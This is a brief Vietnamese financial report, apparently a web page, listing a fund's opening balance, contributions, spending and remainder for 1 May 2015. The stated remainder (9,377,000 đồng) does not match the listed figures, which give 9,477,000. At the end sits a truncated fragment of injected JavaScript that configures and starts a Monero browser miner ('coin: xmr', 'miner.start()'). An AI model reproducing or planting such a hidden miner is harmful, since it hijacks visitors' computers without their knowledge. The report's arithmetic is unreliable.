BÁO CÁO TÀI CHÁNH TRONG NGÀY 1- 5 - 2015

BÁO CÁO TÀI CHÁNH TRONG

NGÀY 1-5-2015

 

                           Tồn quỹ cho đến 1-5-2015:                                             3.039.000 đồng 


                           Đóng góp trước ngày 1-5-2015:                                      8.300.000 đồng

Đóng góp chung trong ngày 1-5-2015:                          31.700.000 đồng

Tổng chi:                                                                     33.562.000 đồng

                Còn lại:                                                                         9.377.000 đồng                

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();